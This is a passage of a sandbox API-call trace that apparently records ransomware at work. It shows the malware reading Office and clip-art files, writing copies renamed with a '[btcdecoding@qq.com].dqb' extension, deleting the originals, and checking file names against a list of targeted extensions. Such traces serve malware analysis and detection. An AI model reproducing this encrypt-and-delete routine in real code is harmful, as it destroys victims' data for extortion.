[0049.179] SetEndOfFile (hFile=0x224) returned 1 [0049.180] CloseHandle (hObject=0x224) returned 1 [0049.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.180] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1 [0049.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.181] lstrlenW (lpString=".doc") returned 4 [0049.181] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString=".docx") returned 5 [0049.181] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0049.181] lstrlenW (lpString=".pdf") returned 4 [0049.181] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString=".xls") returned 4 [0049.181] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString=".xlsx") returned 5 [0049.181] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0049.181] lstrlenW (lpString=".ppt") returned 4 [0049.181] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.181] lstrlenW (lpString=".zip") returned 4 [0049.181] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0049.181] lstrlenW (lpString=".rar") returned 4 [0049.181] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString=".bz2") returned 4 [0049.181] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString=".7z") returned 3 [0049.181] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0049.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.181] lstrlenW (lpString=".dbf") returned 4 [0049.181] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.181] lstrlenW (lpString=".1cd") returned 4 [0049.181] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0049.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0049.181] lstrlenW (lpString=".jpg") returned 4 [0049.181] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.836] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.836] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.836] GetLastError () returned 0x0 [0050.836] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1fa1, lpOverlapped=0x0) returned 1 [0050.837] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1fb0, lpOverlapped=0x0) returned 1 [0050.838] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.838] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.839] SetEndOfFile (hFile=0x178) returned 1 [0050.839] CloseHandle (hObject=0x178) returned 1 [0050.839] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.839] SetEndOfFile (hFile=0x224) returned 1 [0050.840] CloseHandle (hObject=0x224) returned 1 [0050.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0050.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.840] lstrlenW (lpString=".doc") returned 4 [0050.840] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.840] lstrlenW (lpString=".docx") returned 5 [0050.840] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.840] lstrlenW (lpString=".pdf") returned 4 [0050.840] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.840] lstrlenW (lpString=".xls") returned 4 [0050.840] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.840] lstrlenW (lpString=".xlsx") returned 5 [0050.840] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.840] lstrlenW (lpString=".ppt") returned 4 [0050.840] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.841] lstrlenW (lpString=".zip") returned 4 [0050.841] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.841] lstrlenW (lpString=".rar") returned 4 [0050.841] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.841] lstrlenW (lpString=".bz2") returned 4 [0050.841] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.841] lstrlenW (lpString=".7z") returned 3 [0050.841] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.841] lstrlenW (lpString=".dbf") returned 4 [0050.841] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.841] lstrlenW (lpString=".1cd") returned 4 [0050.841] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.841] lstrlenW (lpString=".jpg") returned 4 [0050.841] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.841] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.841] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.842] GetLastError () returned 0x0 [0050.842] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x47a, lpOverlapped=0x0) returned 1 [0050.843] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x480, lpOverlapped=0x0) returned 1 [0050.844] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.844] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.844] SetEndOfFile (hFile=0x178) returned 1 [0050.844] CloseHandle (hObject=0x178) returned 1 [0050.844] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.844] SetEndOfFile (hFile=0x224) returned 1 [0050.845] CloseHandle (hObject=0x224) returned 1 [0050.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0050.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.845] lstrlenW (lpString=".doc") returned 4 [0050.845] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.846] lstrlenW (lpString=".docx") returned 5 [0050.846] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.846] lstrlenW (lpString=".pdf") returned 4 [0050.846] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.846] lstrlenW (lpString=".xls") returned 4 [0050.846] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.846] lstrlenW (lpString=".xlsx") returned 5 [0050.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.846] lstrlenW (lpString=".ppt") returned 4 [0050.846] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.846] lstrlenW (lpString=".zip") returned 4 [0050.846] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.846] lstrlenW (lpString=".rar") returned 4 [0050.846] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.846] lstrlenW (lpString=".bz2") returned 4 [0050.846] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.846] lstrlenW (lpString=".7z") returned 3 [0050.846] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.846] lstrlenW (lpString=".dbf") returned 4 [0050.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.846] lstrlenW (lpString=".1cd") returned 4 [0050.846] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0050.846] lstrlenW (lpString=".jpg") returned 4 [0050.846] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.846] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.847] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.847] GetLastError () returned 0x0 [0050.847] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1d9f, lpOverlapped=0x0) returned 1 [0050.849] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1da0, lpOverlapped=0x0) returned 1 [0050.850] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.850] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.850] SetEndOfFile (hFile=0x178) returned 1 [0050.850] CloseHandle (hObject=0x178) returned 1 [0050.850] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.850] SetEndOfFile (hFile=0x224) returned 1 [0050.851] CloseHandle (hObject=0x224) returned 1 [0050.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.851] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0050.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.851] lstrlenW (lpString=".doc") returned 4 [0050.851] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.851] lstrlenW (lpString=".docx") returned 5 [0050.851] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.851] lstrlenW (lpString=".pdf") returned 4 [0050.852] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.852] lstrlenW (lpString=".xls") returned 4 [0050.852] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.852] lstrlenW (lpString=".xlsx") returned 5 [0050.852] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.852] lstrlenW (lpString=".ppt") returned 4 [0050.852] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.852] lstrlenW (lpString=".zip") returned 4 [0050.852] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.852] lstrlenW (lpString=".rar") returned 4 [0050.852] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.852] lstrlenW (lpString=".bz2") returned 4 [0050.852] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.852] lstrlenW (lpString=".7z") returned 3 [0050.852] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.852] lstrlenW (lpString=".dbf") returned 4 [0050.852] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.852] lstrlenW (lpString=".1cd") returned 4 [0050.852] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0050.852] lstrlenW (lpString=".jpg") returned 4 [0050.852] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.853] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.853] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.853] GetLastError () returned 0x0 [0050.853] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1b48, lpOverlapped=0x0) returned 1 [0050.858] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1b50, lpOverlapped=0x0) returned 1 [0050.859] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.859] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.859] SetEndOfFile (hFile=0x178) returned 1 [0050.859] CloseHandle (hObject=0x178) returned 1 [0050.860] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.860] SetEndOfFile (hFile=0x224) returned 1 [0050.860] CloseHandle (hObject=0x224) returned 1 [0050.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.861] lstrlenW (lpString=".doc") returned 4 [0050.861] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.861] lstrlenW (lpString=".docx") returned 5 [0050.861] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.861] lstrlenW (lpString=".pdf") returned 4 [0050.861] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".xls") returned 4 [0050.861] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".xlsx") returned 5 [0050.861] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.861] lstrlenW (lpString=".ppt") returned 4 [0050.861] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.861] lstrlenW (lpString=".zip") returned 4 [0050.861] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".rar") returned 4 [0050.861] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".bz2") returned 4 [0050.861] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.861] lstrlenW (lpString=".7z") returned 3 [0050.861] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.861] lstrlenW (lpString=".dbf") returned 4 [0050.862] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.862] lstrlenW (lpString=".1cd") returned 4 [0050.862] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0050.862] lstrlenW (lpString=".jpg") returned 4 [0050.862] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.862] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.862] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.862] GetLastError () returned 0x0 [0050.862] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x33c6, lpOverlapped=0x0) returned 1 [0050.864] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x33d0, lpOverlapped=0x0) returned 1 [0050.865] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.865] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.865] SetEndOfFile (hFile=0x178) returned 1 [0050.865] CloseHandle (hObject=0x178) returned 1 [0050.865] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.865] SetEndOfFile (hFile=0x224) returned 1 [0050.911] CloseHandle (hObject=0x224) returned 1 [0050.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.911] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0050.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.911] lstrlenW (lpString=".doc") returned 4 [0050.911] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.911] lstrlenW (lpString=".docx") returned 5 [0050.911] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.911] lstrlenW (lpString=".pdf") returned 4 [0050.911] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.911] lstrlenW (lpString=".xls") returned 4 [0050.911] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.912] lstrlenW (lpString=".xlsx") returned 5 [0050.912] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.912] lstrlenW (lpString=".ppt") returned 4 [0050.912] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.912] lstrlenW (lpString=".zip") returned 4 [0050.912] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.912] lstrlenW (lpString=".rar") returned 4 [0050.912] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.912] lstrlenW (lpString=".bz2") returned 4 [0050.912] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.912] lstrlenW (lpString=".7z") returned 3 [0050.912] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.912] lstrlenW (lpString=".dbf") returned 4 [0050.912] 